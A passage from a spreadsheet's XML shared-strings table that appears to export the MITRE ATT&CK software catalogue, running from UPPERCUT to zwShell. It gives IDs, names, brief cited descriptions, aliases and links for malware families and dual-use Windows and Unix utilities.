    <t>[UPPERCUT](https://attack.mitre.org/software/S0275) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045). (Citation: FireEye APT10 Sept 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0275</t>
  </si>
  <si>
    <t>ANEL</t>
  </si>
  <si>
    <t>S0136</t>
  </si>
  <si>
    <t>USBStealer</t>
  </si>
  <si>
    <t>[USBStealer](https://attack.mitre.org/software/S0136) is malware that has used by [APT28](https://attack.mitre.org/groups/G0007) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0136</t>
  </si>
  <si>
    <t>USB Stealer, Win32/USBStealer</t>
  </si>
  <si>
    <t>S0452</t>
  </si>
  <si>
    <t>USBferry</t>
  </si>
  <si>
    <t>[USBferry](https://attack.mitre.org/software/S0452) is an information stealing malware and has been used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) in targeted attacks against Taiwanese and Philippine air-gapped military environments. [USBferry](https://attack.mitre.org/software/S0452) shares an overlapping codebase with [YAHOYAH](https://attack.mitre.org/software/S0388), though it has several features which makes it a distinct piece of malware.(Citation: TrendMicro Tropic Trooper May 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0452</t>
  </si>
  <si>
    <t>S0221</t>
  </si>
  <si>
    <t>Umbreon</t>
  </si>
  <si>
    <t>A Linux rootkit that provides backdoor access and hides from defenders.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0221</t>
  </si>
  <si>
    <t>S0130</t>
  </si>
  <si>
    <t>Unknown Logger</t>
  </si>
  <si>
    <t>[Unknown Logger](https://attack.mitre.org/software/S0130) is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign. (Citation: Forcepoint Monsoon)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0130</t>
  </si>
  <si>
    <t>S0022</t>
  </si>
  <si>
    <t>Uroburos</t>
  </si>
  <si>
    <t>[Uroburos](https://attack.mitre.org/software/S0022) is a rootkit used by [Turla](https://attack.mitre.org/groups/G0010). (Citation: Kaspersky Turla)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0022</t>
  </si>
  <si>
    <t>S0386</t>
  </si>
  <si>
    <t>Ursnif</t>
  </si>
  <si>
    <t>[Ursnif](https://attack.mitre.org/software/S0386) is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)s, and malicious links.(Citation: NJCCIC Ursnif Sept 2016)(Citation: ProofPoint Ursnif Aug 2016) [Ursnif](https://attack.mitre.org/software/S0386) is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.(Citation: TrendMicro Ursnif Mar 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0386</t>
  </si>
  <si>
    <t>04 June 2019</t>
  </si>
  <si>
    <t>Dreambot, Gozi-ISFB, PE_URSNIF</t>
  </si>
  <si>
    <t>S0442</t>
  </si>
  <si>
    <t>VBShower</t>
  </si>
  <si>
    <t>[VBShower](https://attack.mitre.org/software/S0442) is a backdoor that has been used by [Inception](https://attack.mitre.org/groups/G0100) since at least 2019. [VBShower](https://attack.mitre.org/software/S0442) has been used as a downloader for second stage payloads, including [PowerShower](https://attack.mitre.org/software/S0441).(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0442</t>
  </si>
  <si>
    <t>S0257</t>
  </si>
  <si>
    <t>VERMIN</t>
  </si>
  <si>
    <t>[VERMIN](https://attack.mitre.org/software/S0257) is a remote access tool written in the Microsoft .NET framework. It is mostly composed of original code, but also has some open source code. (Citation: Unit 42 VERMIN Jan 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0257</t>
  </si>
  <si>
    <t>S0476</t>
  </si>
  <si>
    <t>Valak</t>
  </si>
  <si>
    <t>[Valak](https://attack.mitre.org/software/S0476) is a multi-stage modular malware that can function as a standalone information stealer or downloader, first observed in 2019 targeting enterprises in the US and Germany.(Citation: Cybereason Valak May 2020)(Citation: Unit 42 Valak July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0476</t>
  </si>
  <si>
    <t>S0207</t>
  </si>
  <si>
    <t>Vasport</t>
  </si>
  <si>
    <t>[Vasport](https://attack.mitre.org/software/S0207) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Vasport May 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0207</t>
  </si>
  <si>
    <t>S0180</t>
  </si>
  <si>
    <t>Volgmer</t>
  </si>
  <si>
    <t>[Volgmer](https://attack.mitre.org/software/S0180) is a backdoor Trojan designed to provide covert access to a compromised system. It has been used since at least 2013 to target the government, financial, automotive, and media industries. Its primary delivery mechanism is suspected to be spearphishing. (Citation: US-CERT Volgmer Nov 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0180</t>
  </si>
  <si>
    <t>S0109</t>
  </si>
  <si>
    <t>WEBC2</t>
  </si>
  <si>
    <t>[WEBC2](https://attack.mitre.org/software/S0109) is a family of backdoor malware used by [APT1](https://attack.mitre.org/groups/G0006) as early as July 2006. [WEBC2](https://attack.mitre.org/software/S0109) backdoors are designed to retrieve a webpage, with commands hidden in HTML comments or special tags, from a predetermined C2 server. (Citation: Mandiant APT1 Appendix)(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0109</t>
  </si>
  <si>
    <t>Wes Hurd</t>
  </si>
  <si>
    <t>S0155</t>
  </si>
  <si>
    <t>WINDSHIELD</t>
  </si>
  <si>
    <t>[WINDSHIELD](https://attack.mitre.org/software/S0155) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0155</t>
  </si>
  <si>
    <t>S0219</t>
  </si>
  <si>
    <t>WINERACK</t>
  </si>
  <si>
    <t>[WINERACK](https://attack.mitre.org/software/S0219) is a backdoor used by [APT37](https://attack.mitre.org/groups/G0067). (Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0219</t>
  </si>
  <si>
    <t>S0366</t>
  </si>
  <si>
    <t>WannaCry</t>
  </si>
  <si>
    <t>[WannaCry](https://attack.mitre.org/software/S0366) is ransomware that was first seen in a global attack during May 2017, which affected more than 150 countries. It contains worm-like features to spread itself across a computer network using the SMBv1 exploit EternalBlue.(Citation: LogRhythm WannaCry)(Citation: US-CERT WannaCry 2017)(Citation: Washington Post WannaCry 2017)(Citation: FireEye WannaCry 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0366</t>
  </si>
  <si>
    <t>WCry, WanaCry, WanaCrypt, WanaCrypt0r</t>
  </si>
  <si>
    <t>Jan Miller, CrowdStrike</t>
  </si>
  <si>
    <t>S0579</t>
  </si>
  <si>
    <t>Waterbear</t>
  </si>
  <si>
    <t>[Waterbear](https://attack.mitre.org/software/S0579) is modular malware attributed to [BlackTech](https://attack.mitre.org/groups/G0098) that has been used primarily for lateral movement, decrypting, and triggering payloads and is capable of hiding network behaviors.(Citation: Trend Micro Waterbear December 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0579</t>
  </si>
  <si>
    <t>22 February 2021</t>
  </si>
  <si>
    <t>S0515</t>
  </si>
  <si>
    <t>WellMail</t>
  </si>
  <si>
    <t>[WellMail](https://attack.mitre.org/software/S0515) is a lightweight malware written in Golang used by [APT29](https://attack.mitre.org/groups/G0016), similar in design and structure to [WellMess](https://attack.mitre.org/software/S0514).(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0515</t>
  </si>
  <si>
    <t>S0514</t>
  </si>
  <si>
    <t>WellMess</t>
  </si>
  <si>
    <t>[WellMess](https://attack.mitre.org/software/S0514) is lightweight malware family with variants written in .NET and Golang that has been in use since at least 2018 by [APT29](https://attack.mitre.org/groups/G0016).(Citation: CISA WellMess July 2020)(Citation: PWC WellMess July 2020)(Citation: NCSC APT29 July 2020)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0514</t>
  </si>
  <si>
    <t>22 March 2021</t>
  </si>
  <si>
    <t>S0206</t>
  </si>
  <si>
    <t>Wiarp</t>
  </si>
  <si>
    <t>[Wiarp](https://attack.mitre.org/software/S0206) is a trojan used by [Elderwood](https://attack.mitre.org/groups/G0066) to open a backdoor on compromised hosts. (Citation: Symantec Elderwood Sept 2012) (Citation: Symantec Wiarp May 2012)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0206</t>
  </si>
  <si>
    <t>S0059</t>
  </si>
  <si>
    <t>WinMM</t>
  </si>
  <si>
    <t>[WinMM](https://attack.mitre.org/software/S0059) is a full-featured, simple backdoor used by [Naikon](https://attack.mitre.org/groups/G0019). (Citation: Baumgartner Naikon 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0059</t>
  </si>
  <si>
    <t>S0466</t>
  </si>
  <si>
    <t>WindTail</t>
  </si>
  <si>
    <t>[WindTail](https://attack.mitre.org/software/S0466) is a macOS surveillance implant used by [Windshift](https://attack.mitre.org/groups/G0112). [WindTail](https://attack.mitre.org/software/S0466) shares code similarities with Hack Back aka KitM OSX.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0466</t>
  </si>
  <si>
    <t>04 June 2020</t>
  </si>
  <si>
    <t>S0005</t>
  </si>
  <si>
    <t>Windows Credential Editor</t>
  </si>
  <si>
    <t>[Windows Credential Editor](https://attack.mitre.org/software/S0005) is a password dumping tool. (Citation: Amplia WCE)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0005</t>
  </si>
  <si>
    <t>WCE</t>
  </si>
  <si>
    <t>S0191</t>
  </si>
  <si>
    <t>Winexe</t>
  </si>
  <si>
    <t>[Winexe](https://attack.mitre.org/software/S0191) is a lightweight, open source tool similar to [PsExec](https://attack.mitre.org/software/S0029) designed to allow system administrators to execute commands on remote servers. (Citation: Winexe Github Sept 2013) [Winexe](https://attack.mitre.org/software/S0191) is unique in that it is a GNU/Linux based client. (Citation: Überwachung APT28 Forfiles June 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0191</t>
  </si>
  <si>
    <t>S0176</t>
  </si>
  <si>
    <t>Wingbird</t>
  </si>
  <si>
    <t>[Wingbird](https://attack.mitre.org/software/S0176) is a backdoor that appears to be a version of commercial software [FinFisher](https://attack.mitre.org/software/S0182). It is reportedly used to attack individual computers instead of networks. It was used by [NEODYMIUM](https://attack.mitre.org/groups/G0055) in a May 2016 campaign. (Citation: Microsoft SIR Vol 21) (Citation: Microsoft NEODYMIUM Dec 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0176</t>
  </si>
  <si>
    <t>S0430</t>
  </si>
  <si>
    <t>Winnti for Linux</t>
  </si>
  <si>
    <t>[Winnti for Linux](https://attack.mitre.org/software/S0430) is a trojan, seen since at least 2015, designed specifically for targeting Linux systems. Reporting indicates the winnti malware family is shared across a number of actors including [Winnti Group](https://attack.mitre.org/groups/G0044). The Windows variant is tracked separately under [Winnti for Windows](https://attack.mitre.org/software/S0141).(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0430</t>
  </si>
  <si>
    <t>29 April 2020</t>
  </si>
  <si>
    <t>S0141</t>
  </si>
  <si>
    <t>Winnti for Windows</t>
  </si>
  <si>
    <t>[Winnti for Windows](https://attack.mitre.org/software/S0141) is a Trojan that has been used by multiple groups to carry out intrusions in varied regions from at least 2010 to 2016. One of the groups using this malware is referred to by the same name, [Winnti Group](https://attack.mitre.org/groups/G0044); however, reporting indicates a second distinct group, [Axiom](https://attack.mitre.org/groups/G0001), also uses the malware. (Citation: Kaspersky Winnti April 2013) (Citation: Microsoft Winnti Jan 2017) (Citation: Novetta Winnti April 2015) The Linux variant is tracked separately under [Winnti for Linux](https://attack.mitre.org/software/S0430).(Citation: Chronicle Winnti for Linux May 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0141</t>
  </si>
  <si>
    <t>04 May 2020</t>
  </si>
  <si>
    <t>S0041</t>
  </si>
  <si>
    <t>Wiper</t>
  </si>
  <si>
    <t>[Wiper](https://attack.mitre.org/software/S0041) is a family of destructive malware used in March 2013 during breaches of South Korean banks and media companies. (Citation: Dell Wiper)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0041</t>
  </si>
  <si>
    <t>S0161</t>
  </si>
  <si>
    <t>XAgentOSX</t>
  </si>
  <si>
    <t>[XAgentOSX](https://attack.mitre.org/software/S0161) is a trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007)  on OS X and appears to be a port of their standard [CHOPSTICK](https://attack.mitre.org/software/S0023) or XAgent trojan. (Citation: XAgentOSX 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0161</t>
  </si>
  <si>
    <t>OSX.Sofacy</t>
  </si>
  <si>
    <t>S0117</t>
  </si>
  <si>
    <t>XTunnel</t>
  </si>
  <si>
    <t>[XTunnel](https://attack.mitre.org/software/S0117) a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by [APT28](https://attack.mitre.org/groups/G0007) during the compromise of the Democratic National Committee. (Citation: Crowdstrike DNC June 2016) (Citation: Invincea XTunnel) (Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0117</t>
  </si>
  <si>
    <t>21 March 2020</t>
  </si>
  <si>
    <t>Trojan.Shunnael, X-Tunnel, XAPS</t>
  </si>
  <si>
    <t>S0341</t>
  </si>
  <si>
    <t>Xbash</t>
  </si>
  <si>
    <t>[Xbash](https://attack.mitre.org/software/S0341) is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. [Xbash](https://attack.mitre.org/software/S0341) was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.(Citation: Unit42 Xbash Sept 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0341</t>
  </si>
  <si>
    <t>S0388</t>
  </si>
  <si>
    <t>YAHOYAH</t>
  </si>
  <si>
    <t>[YAHOYAH](https://attack.mitre.org/software/S0388) is a Trojan used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) as a second-stage backdoor.(Citation: TrendMicro TropicTrooper 2015)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0388</t>
  </si>
  <si>
    <t>17 June 2019</t>
  </si>
  <si>
    <t>S0086</t>
  </si>
  <si>
    <t>ZLib</t>
  </si>
  <si>
    <t>[ZLib](https://attack.mitre.org/software/S0086) is a full-featured backdoor that was used as a second-stage implant by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2014 to 2015. It is malware and should not be confused with the compression library from which its name is derived. (Citation: Cylance Dust Storm)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0086</t>
  </si>
  <si>
    <t>S0251</t>
  </si>
  <si>
    <t>Zebrocy</t>
  </si>
  <si>
    <t xml:space="preserve">[Zebrocy](https://attack.mitre.org/software/S0251) is a Trojan that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. (Citation: Palo Alto Sofacy 06-2018)(Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)(Citation: CISA Zebrocy Oct 2020) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0251</t>
  </si>
  <si>
    <t>Zekapab</t>
  </si>
  <si>
    <t>Emily Ratliff, IBM</t>
  </si>
  <si>
    <t>S0230</t>
  </si>
  <si>
    <t>ZeroT</t>
  </si>
  <si>
    <t>[ZeroT](https://attack.mitre.org/software/S0230) is a Trojan used by [TA459](https://attack.mitre.org/groups/G0062), often in conjunction with [PlugX](https://attack.mitre.org/software/S0013). (Citation: Proofpoint TA459 April 2017) (Citation: Proofpoint ZeroT Feb 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0230</t>
  </si>
  <si>
    <t>S0027</t>
  </si>
  <si>
    <t>Zeroaccess</t>
  </si>
  <si>
    <t>[Zeroaccess](https://attack.mitre.org/software/S0027) is a kernel-mode [Rootkit](https://attack.mitre.org/techniques/T1014) that attempts to add victims to the ZeroAccess botnet, often for monetary gain. (Citation: Sophos ZeroAccess)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0027</t>
  </si>
  <si>
    <t>Trojan.Zeroaccess</t>
  </si>
  <si>
    <t>S0330</t>
  </si>
  <si>
    <t>Zeus Panda</t>
  </si>
  <si>
    <t>[Zeus Panda](https://attack.mitre.org/software/S0330) is a Trojan designed to steal banking information and other sensitive credentials for exfiltration. [Zeus Panda](https://attack.mitre.org/software/S0330)’s original source code was leaked in 2011, allowing threat actors to use its source code as a basis for new malware variants. It is mainly used to target Windows operating systems ranging from Windows XP through Windows 10.(Citation: Talos Zeus Panda Nov 2017)(Citation: GDATA Zeus Panda June 2017)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0330</t>
  </si>
  <si>
    <t>S0412</t>
  </si>
  <si>
    <t>ZxShell</t>
  </si>
  <si>
    <t>[ZxShell](https://attack.mitre.org/software/S0412) is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.(Citation: FireEye APT41 Aug 2019)(Citation: Talos ZxShell Oct 2014 )</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0412</t>
  </si>
  <si>
    <t>24 September 2019</t>
  </si>
  <si>
    <t>Sensocode</t>
  </si>
  <si>
    <t>S0202</t>
  </si>
  <si>
    <t>adbupd</t>
  </si>
  <si>
    <t>[adbupd](https://attack.mitre.org/software/S0202) is a backdoor used by [PLATINUM](https://attack.mitre.org/groups/G0068) that is similar to [Dipsind](https://attack.mitre.org/software/S0200). (Citation: Microsoft PLATINUM April 2016)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0202</t>
  </si>
  <si>
    <t>S0110</t>
  </si>
  <si>
    <t>at</t>
  </si>
  <si>
    <t>[at](https://attack.mitre.org/software/S0110) is used to schedule tasks on a system to run at a specified date or time. (Citation: TechNet At)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0110</t>
  </si>
  <si>
    <t>at.exe</t>
  </si>
  <si>
    <t>S0471</t>
  </si>
  <si>
    <t>build_downer</t>
  </si>
  <si>
    <t>[build_downer](https://attack.mitre.org/software/S0471) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0471</t>
  </si>
  <si>
    <t>S0160</t>
  </si>
  <si>
    <t>certutil</t>
  </si>
  <si>
    <t>[certutil](https://attack.mitre.org/software/S0160) is a command-line utility that can be used to obtain certificate authority information and configure Certificate Services. (Citation: TechNet Certutil)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0160</t>
  </si>
  <si>
    <t>31 July 2019</t>
  </si>
  <si>
    <t>certutil.exe</t>
  </si>
  <si>
    <t>S0106</t>
  </si>
  <si>
    <t>cmd</t>
  </si>
  <si>
    <t>[cmd](https://attack.mitre.org/software/S0106) is the Windows command-line interpreter that can be used to interact with systems and execute other processes and utilities. (Citation: TechNet Cmd)
Cmd.exe contains native functionality to perform many operations to interact with the system, including listing files in a directory (e.g., &lt;code&gt;dir&lt;/code&gt; (Citation: TechNet Dir)), deleting files (e.g., &lt;code&gt;del&lt;/code&gt; (Citation: TechNet Del)), and copying files (e.g., &lt;code&gt;copy&lt;/code&gt; (Citation: TechNet Copy)).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0106</t>
  </si>
  <si>
    <t>cmd.exe</t>
  </si>
  <si>
    <t>S0472</t>
  </si>
  <si>
    <t>down_new</t>
  </si>
  <si>
    <t xml:space="preserve"> [down_new](https://attack.mitre.org/software/S0472) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0472</t>
  </si>
  <si>
    <t>S0105</t>
  </si>
  <si>
    <t>dsquery</t>
  </si>
  <si>
    <t>[dsquery](https://attack.mitre.org/software/S0105) is a command-line utility that can be used to query Active Directory for information from a system within a domain. (Citation: TechNet Dsquery) It is typically installed only on Windows Server versions but can be installed on non-server variants through the Microsoft-provided Remote Server Administration Tools bundle.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0105</t>
  </si>
  <si>
    <t>dsquery.exe</t>
  </si>
  <si>
    <t>S0404</t>
  </si>
  <si>
    <t>esentutl</t>
  </si>
  <si>
    <t>[esentutl](https://attack.mitre.org/software/S0404) is a command-line tool that provides database utilities for the Windows Extensible Storage Engine.(Citation: Microsoft Esentutl)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0404</t>
  </si>
  <si>
    <t>03 September 2019</t>
  </si>
  <si>
    <t>esentutl.exe</t>
  </si>
  <si>
    <t>S0032</t>
  </si>
  <si>
    <t>gh0st RAT</t>
  </si>
  <si>
    <t>[gh0st RAT](https://attack.mitre.org/software/S0032) is a remote access tool (RAT). The source code is public and it has been used by multiple groups. (Citation: FireEye Hacking Team)(Citation: Arbor Musical Chairs Feb 2018)(Citation: Nccgroup Gh0st April 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0032</t>
  </si>
  <si>
    <t>2.3</t>
  </si>
  <si>
    <t>S0008</t>
  </si>
  <si>
    <t>gsecdump</t>
  </si>
  <si>
    <t>[gsecdump](https://attack.mitre.org/software/S0008) is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. (Citation: TrueSec Gsecdump)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0008</t>
  </si>
  <si>
    <t>S0071</t>
  </si>
  <si>
    <t>hcdLoader</t>
  </si>
  <si>
    <t>[hcdLoader](https://attack.mitre.org/software/S0071) is a remote access tool (RAT) that has been used by [APT18](https://attack.mitre.org/groups/G0026). (Citation: Dell Lateral Movement)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0071</t>
  </si>
  <si>
    <t>S0068</t>
  </si>
  <si>
    <t>httpclient</t>
  </si>
  <si>
    <t>[httpclient](https://attack.mitre.org/software/S0068) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool that provides a limited range of functionality, suggesting it is likely used as a second-stage or supplementary/backup tool. (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0068</t>
  </si>
  <si>
    <t>S0278</t>
  </si>
  <si>
    <t>iKitten</t>
  </si>
  <si>
    <t>[iKitten](https://attack.mitre.org/software/S0278) is a macOS exfiltration agent  (Citation: objsee mac malware 2017).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0278</t>
  </si>
  <si>
    <t>OSX/MacDownloader</t>
  </si>
  <si>
    <t>S0101</t>
  </si>
  <si>
    <t>ifconfig</t>
  </si>
  <si>
    <t>[ifconfig](https://attack.mitre.org/software/S0101) is a Unix-based utility used to gather information about and interact with the TCP/IP settings on a system. (Citation: Wikipedia Ifconfig)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0101</t>
  </si>
  <si>
    <t>S0100</t>
  </si>
  <si>
    <t>ipconfig</t>
  </si>
  <si>
    <t>[ipconfig](https://attack.mitre.org/software/S0100) is a Windows utility that can be used to find information about a system's TCP/IP, DNS, DHCP, and adapter configuration. (Citation: TechNet Ipconfig)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0100</t>
  </si>
  <si>
    <t>ipconfig.exe</t>
  </si>
  <si>
    <t>S0283</t>
  </si>
  <si>
    <t>jRAT</t>
  </si>
  <si>
    <t>[jRAT](https://attack.mitre.org/software/S0283) is a cross-platform, Java-based backdoor originally available for purchase in 2012. Variants of [jRAT](https://attack.mitre.org/software/S0283) have been distributed via a software-as-a-service platform, similar to an online subscription model.(Citation: Kaspersky Adwind Feb 2016) (Citation: jRAT Symantec Aug 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0283</t>
  </si>
  <si>
    <t>Adwind, AlienSpy, Frutas, JSocket, Sockrat, Trojan.Maljava, Unrecom, jBiFrost, jFrutas</t>
  </si>
  <si>
    <t>S0175</t>
  </si>
  <si>
    <t>meek</t>
  </si>
  <si>
    <t>[meek](https://attack.mitre.org/software/S0175) is an open-source Tor plugin that tunnels Tor traffic through HTTPS connections.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0175</t>
  </si>
  <si>
    <t>S0102</t>
  </si>
  <si>
    <t>nbtstat</t>
  </si>
  <si>
    <t>[nbtstat](https://attack.mitre.org/software/S0102) is a utility used to troubleshoot NetBIOS name resolution. (Citation: TechNet Nbtstat)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0102</t>
  </si>
  <si>
    <t>nbtstat.exe</t>
  </si>
  <si>
    <t>S0108</t>
  </si>
  <si>
    <t>netsh</t>
  </si>
  <si>
    <t>[netsh](https://attack.mitre.org/software/S0108) is a scripting utility used to interact with networking components on local or remote systems. (Citation: TechNet Netsh)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0108</t>
  </si>
  <si>
    <t>netsh.exe</t>
  </si>
  <si>
    <t>S0104</t>
  </si>
  <si>
    <t>netstat</t>
  </si>
  <si>
    <t>[netstat](https://attack.mitre.org/software/S0104) is an operating system utility that displays active TCP connections, listening ports, and network statistics. (Citation: TechNet Netstat)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0104</t>
  </si>
  <si>
    <t>netstat.exe</t>
  </si>
  <si>
    <t>S0385</t>
  </si>
  <si>
    <t>njRAT</t>
  </si>
  <si>
    <t>[njRAT](https://attack.mitre.org/software/S0385) is a remote access tool (RAT) that was first observed in 2012. It has been used by threat actors in the Middle East.(Citation: Fidelis njRAT June 2013)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0385</t>
  </si>
  <si>
    <t>Bladabindi, LV, Njw0rm</t>
  </si>
  <si>
    <t>S0067</t>
  </si>
  <si>
    <t>pngdowner</t>
  </si>
  <si>
    <t>[pngdowner](https://attack.mitre.org/software/S0067) is malware used by [Putter Panda](https://attack.mitre.org/groups/G0024). It is a simple tool with limited functionality and no persistence mechanism, suggesting it is used only as a simple "download-and-
execute" utility. (Citation: CrowdStrike Putter Panda)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0067</t>
  </si>
  <si>
    <t>S0006</t>
  </si>
  <si>
    <t>pwdump</t>
  </si>
  <si>
    <t>[pwdump](https://attack.mitre.org/software/S0006) is a credential dumper. (Citation: Wikipedia pwdump)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0006</t>
  </si>
  <si>
    <t>S0103</t>
  </si>
  <si>
    <t>route</t>
  </si>
  <si>
    <t>[route](https://attack.mitre.org/software/S0103) can be used to find or change information within the local system IP routing table. (Citation: TechNet Route)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0103</t>
  </si>
  <si>
    <t>route.exe</t>
  </si>
  <si>
    <t>S0111</t>
  </si>
  <si>
    <t>schtasks</t>
  </si>
  <si>
    <t>[schtasks](https://attack.mitre.org/software/S0111) is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. (Citation: TechNet Schtasks)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0111</t>
  </si>
  <si>
    <t>schtasks.exe</t>
  </si>
  <si>
    <t>S0227</t>
  </si>
  <si>
    <t>spwebmember</t>
  </si>
  <si>
    <t>[spwebmember](https://attack.mitre.org/software/S0227) is a Microsoft SharePoint enumeration and data dumping tool written in .NET. (Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0227</t>
  </si>
  <si>
    <t>S0225</t>
  </si>
  <si>
    <t>sqlmap</t>
  </si>
  <si>
    <t>[sqlmap](https://attack.mitre.org/software/S0225) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. (Citation: sqlmap Introduction)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0225</t>
  </si>
  <si>
    <t>S0123</t>
  </si>
  <si>
    <t>xCmd</t>
  </si>
  <si>
    <t>[xCmd](https://attack.mitre.org/software/S0123) is an open source tool that is similar to [PsExec](https://attack.mitre.org/software/S0029) and allows the user to execute applications on remote systems. (Citation: xCmd)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0123</t>
  </si>
  <si>
    <t>S0248</t>
  </si>
  <si>
    <t>yty</t>
  </si>
  <si>
    <t>[yty](https://attack.mitre.org/software/S0248) is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. (Citation: ASERT Donot March 2018)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/software/S0248</t>
  </si>
  <si>
    <t>S0350</t>
  </si>
  <si>
    <t>zwShell</t>
  </si>
  <si>
